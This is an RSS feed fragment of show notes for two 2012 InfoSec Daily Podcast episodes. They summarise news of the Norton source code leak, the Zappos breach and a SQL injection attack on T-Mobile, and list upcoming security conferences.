	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://thehackernews.com/2012/01/hacker-will-release-full-norton.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://thehackernews.com/2012/01/hacker-will-release-full-norton.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A hacker with code name of &#39;Yama Tough&#39; announce via Twitter that on Tuesday he will leak the full source code for Symantec Corp&#39;s flagship Norton Antivirus software which is 1.7GB src.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week Yama Tough has released fragments of source code from Symantec products along with a cache of emails. The hacker says all the data was taken from Indian government servers. Yama Tough is trying to prove that Indian government was snooping on America and China.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">YamaTough said via Twitter &quot;Pass it on to forensics and win the lawsuit,&quot;.He has offered support to an American man who filed a lawsuit against Symantec Corp by publishing source code from a 2006 version of Norton Utilities, a software program at the heart of the legal dispute. It was not immediately clear how the source code might help the case.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Symantec spokesperson commented on the incident:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We are still gathering information on the details and are not in a position to provide specifics on the third party involved. Presently, we have no indication that the code disclosure impacts the functionality or security of Symantec&rsquo;s solutions. Furthermore, there are no indications that customer information has been impacted or exposed at this time.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec has confirmed that hackers have managed to steal a portion of Norton Antivirus&rsquo; source code, used in two discontinued enterprise products. According to Symantec, the company&rsquo;s servers weren&rsquo;t hacked, but the hackers managed to get the code from a third-party server.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/zappos-says-24-million-customers-affected-data-breach-011612"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/zappos-says-24-million-customers-affected-data-breach-011612</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Online retailer Zappos said that its network has been compromised and attackers were able to access personal information belonging to more than 24 million of its customers. Zappos said that its database that contains customers&#39; credit card numbers was not compromised, however.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We were recently the victim of a cyber attack by a criminal who gained access to parts of our internal network and systems through one of our servers in Kentucky. We are cooperating with law enforcement to undergo an exhaustive investigation,&quot; Tony Hsieh, the company CEO, said in an</span><a href="http://blogs.zappos.com/securityemail"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> email to employees</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Because of the nature of the investigation, the information in this email is being sent a bit more formally, and unfortunately we are not able to provide any more details about specifics of the attack beyond what is in this email and the link at the end of this email, but we can say that THE DATABASE THAT STORES OUR CUSTOMERS&#39; CRITICAL CREDIT CARD AND OTHER PAYMENT DATA WAS NOT AFFECTED OR ACCESSED.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Zappos is a large retailer, mainly known for its shoe business. But the company also sells a large range of other goods, including clothing and accessories. As a result of the data breach, Zappos already has expired all of the affected customers&#39; passwords and is requiring them to reset their credentials.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adrian&rsquo;s top Zappos jokes:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. Hacking Zappos was no mean feet.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. Servers at Zappos were probably </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">laced</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with malware.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. I bet the network admins at Zappos feel like real heels.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. Details are still coming in about the compromise, so we are still waiting for the other shoe to drop.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. They will have a hard time capturing the culprit, &nbsp;he was probably behind 7 SOCKS proxies. <img src='http://www.isdpodcast.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/T-Mobile-Hacked-by-TeaMp0isoN-Administrators-and-Staff-Exposed-Exclusive-246643.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/T-Mobile-Hacked-by-TeaMp0isoN-Administrators-and-Staff-Exposed-Exclusive-246643.shtml</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The infamous hacktivist collective TeaMp0isoN breached the official website of T-Mobile, one of the largest wireless communications providers in the world, leaking sensitive login information that belongs to their staff and administrators.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers posted a document on </span><a href="http://pastebin.com/HhaPZ1BE"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Pastebin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to prove the success of the operation, but we&rsquo;ve contacted them to find out the details and the main reason why T-Mobile is a target.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;They are known to be supporting the Big Brother Patriot Act law. Any cell phone company doing so I would see as a target,&rdquo; said one of the hackers.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;One of the main reasons for the hack is because they are corrupted, but we also wanted to show how weak their security is.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers found SQL injection vulnerabilities on t-mobile.com and newsroom.t-mobile.com and managed to get a hold of the names, email addresses, phone numbers and passwords of the administrators and staff members.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Look at the passwords, epic fail. All the passwords are manually given to staff via an admin who uses the same set of passwords,&rdquo; the hackers said after analyzing the data.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;ve tried to get in touch with the company for a statement, but the media contact page is hosted on one of the breached subdomains and it&rsquo;s currently taken offline, which probably means that they&#39;re currently dealing with the incident.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-569-happy-mlk-death-of-sopa-dataexfil-norton-source-code-zappos-teamp0ison/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3382/0/infosec-daily-podcast-episode-569.mp3" length="19188651" type="audio/mpeg" />
		<itunes:duration>0:39:56</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 569 for January 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 569 for January 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Anti PIPA/SOPA Meetup
	When: January 18, 2012
	Where: NY Tech Meetup HQ, New York City
	http://www.meetup.com/ny-tech/events/47879702/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 568 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-568-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-568-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 15 Jan 2012 03:06:35 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3380</guid>
		<description><![CDATA[&#160; Episode 568 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 568 for January 14, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester. Guests: spridel, aricon, hackett, gozes, and connection. Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent"><b><span>Episode 568 &#8211; Weekend Wrap-up with Dr. b0n3z</span><br />
	<span>InfoSec Daily Podcast Episode 568 for January 14, 2012. &nbsp;</span><span>Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.</span></p>
<p>	<span>Guests: spridel, aricon, hackett, gozes, and connection.</span></p>
<p>	</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Announcements:</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Unsung Heros</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span>http://blog.c22.cc/2012/01/13/unsung-heros</span></a></b></p>
<p>	<b><br />
	<span>Information Security Blogger Awards 2012</span><br />
	<span>Since we were over looked again for the Best Podcast on Security </span><span>you can email </span><span>ashimmy@hotmail.com</span><span> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on</span><a href="http://www.ashimmy.com/"><span> </span><span>www.ashimmy.com</span></a><span>.</span></p>
<p>	<span>Brad Smith (theNurse)</span><br />
	<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;text-decoration: none;vertical-align: baseline">Anti PIPA/SOPA Meetup</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">Meetup Groups across the country are mobilizing to help stop</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">SOPA and PIPA, as we will very potentially see PIPA&#039;s passage</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">in the next two weeks if we don&#039;t act.</span></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">We at Meetup HQ are alerting members of the New York Tech</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">community about a chance to organize together. The NY Tech</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">Meetup, New York&#039;s largest Tech Meetup, has scheduled an</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">emergency Meetup on Wednesday, January 18. In order to build</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">critical mass and maintain an organized event *please RSVP in</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;text-decoration: none;vertical-align: baseline">the NY Tech Meetup* if you want to participate.</span></p>
<p>	<span>Go here to RSVP:</span><a href="http://www.meetup.com/ny-tech/events/47879702/"><span> </span><span>http://www.meetup.com/ny-tech/events/47879702/</span></a></p>
<p>	<span>CampusCon 2012</span><br />
	<span>When: January 21, 2012</span><br />
	<span>Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span>http://campuscon.hackingwit.com</span></a><br />
	<span>(from Baconzombie)</span></p>
<p>	<span>New England InfoSec Tweetup</span><br />
	<span>When: January 21, 2012</span><br />
	<span>Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span>http://neistu3.eventbrite.com/</span></a></p>
<p>	<span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span>When: Starts January 24, 2012</span><br />
	<span>Where: Atlanta, GA</span><br />
	<span>Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span>ShmooCon 2012</span><br />
	<span>When: January 27th-29th, 2012</span><br />
	<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a></p>
<p>	<span>Schmoocon Epilogue</span><br />
	<span>When: After Schmoocon</span><br />
	<span>Where: Washington, DC</span><br />
	<span>Hit up anyone in NOVA Hackers</span></p>
<p>	<span>Metasploit Framework Unleashed Cincinnati</span><br />
	<span>When: February 11, 2012.</span><br />
	<span>Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span>https://msfucincy.wordpress.com/</span></a><br />
	<span>$20 donation for #HFC</span></p>
<p>	<span>Social Engineering Training</span><br />
	<span>When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span>When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span>When: August 20-24, 2012</span><br />
	<span>Where: &nbsp;Bristol, UK</span><br />
	<span>When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span>BSides Chicago<br class="kix-line-break" /><br />
	</span><span>When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
	Where: Volcano Room (further info coming)</span><br />
	<span>Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span>http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span>They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span>Linuxfest Northwest 2012</span><br />
	<span>When: Saturday, April 28th-29th, 2012</span><br />
	<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>AIDE 2012</span><br />
	<span>When: May 21-25, 2012</span><br />
	<span>Where: MU Forensic Science Center</span><br />
	<span>Huntington, West Virginia</span><br />
	<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>LayerOne 2012</span><br />
	<span>When: May 26-27, 2012</span><br />
	<span>Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>Defcon 20</span><br />
	<span>When: July 26-29, 2012</span><br />
	<span>Where: Rio Hotel and Casino</span><br />
	<a href="http://defcon.org/"><span>defcon.org</span></a></p>
<p>	<span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span>When: &nbsp;September 27-30, 2012</span><br />
	<span>Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p>	<span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Stories</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://hacktalk.net/"><span>http://hacktalk.net/</span></a></b></p>
<p>	<b><br />
	<span>Pentest Lessons:</span><br />
	<span>Adam Compton &amp; Zac Wagle&#039;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span>https://twitter.com/pentestlessons</span></a><span>.</span><br />
	<span>Lesson 1:</span><span> Keep your employees SO busy that they don&rsquo;t have time to get pwnd.</span><br />
	<span>Lesson 2: </span><span>Make sure you&#039;re going to get paid, before you submit your invoice.</span><br />
	<span>Lesson 3: </span><span>Don&rsquo;t sign shit!</span><br />
	<span>Lesson 4: </span><span>Pre-meeting doxing, and social engineer to be what your client needs you to be&rdquo;</span><br />
	<span>Lesson 5:</span><span> Following don&rsquo;t sign shit, remember who is paying the bill. But that does not mean you need to be a complete passive tool while dealing with the customer. Be professional and to the point. Don&rsquo;t ramble.</span><br />
	<span>Lesson 6</span><span>: If you do not know how to answer a question, don&#039;t make shit up.</span></p>
<p>	<span>Source:</span><span> </span><a href="http://www.wired.com/threatlevel/2012/01/dns-sopa-provision/"><span>http://www.wired.com/threatlevel/2012/01/dns-sopa-provision/</span></a></p>
<p>	<span>Source: </span><a href="http://www.infosecisland.com/blogview/18892-Ten-Steps-to-Protect-Your-Organizations-Data.html"><span>http://www.infosecisland.com/blogview/18892-Ten-Steps-to-Protect-Your-Organizations-Data.html</span></a></p>
<p>	<span>Source: </span><a href="http://www.pcmag.com/article2/0,2817,2398926,00.asp"><span>http://www.pcmag.com/article2/0,2817,2398926,00.asp</span></a></p>
<p>	<span>Source: </span><a href="http://usestealth.com/"><span>http://usestealth.com/</span></a></p>
<p>	<span>Source: </span><a href="http://thehackernews.com/2012/01/one-click-fraud-targeting-japan.html"><span>http://thehackernews.com/2012/01/one-click-fraud-targeting-japan.html</span></a></p>
<p>	<span>Source: </span><a href="http://thehackernews.com/2012/01/security-enhanced-se-android-released.html"><span>http://thehackernews.com/2012/01/security-enhanced-se-android-released.html</span></a></p>
<p>	<span>Source: </span><a href="http://blogs.computerworlduk.com/open-enterprise/2012/01/is-microsoft-blocking-linux-booting-on-arm-based-hardware/index.htm"><span>http://blogs.computerworlduk.com/open-enterprise/2012/01/is-microsoft-blocking-linux-booting-on-arm-based-hardware/index.htm</span></a></b></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-568-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3380/0/infosec-daily-podcast-episode-568.mp3" length="25620669" type="audio/mpeg" />
		<itunes:duration>0:53:23</itunes:duration>
		<itunes:subtitle>&#160;
Episode 568 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 568 for January 14, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.
	Guests: spridel, aricon, hackett, gozes, and[...]</itunes:subtitle>
		<itunes:summary>&#160;
Episode 568 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 568 for January 14, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.
	Guests: spridel, aricon, hackett, gozes, and connection.
	
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros
	
	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
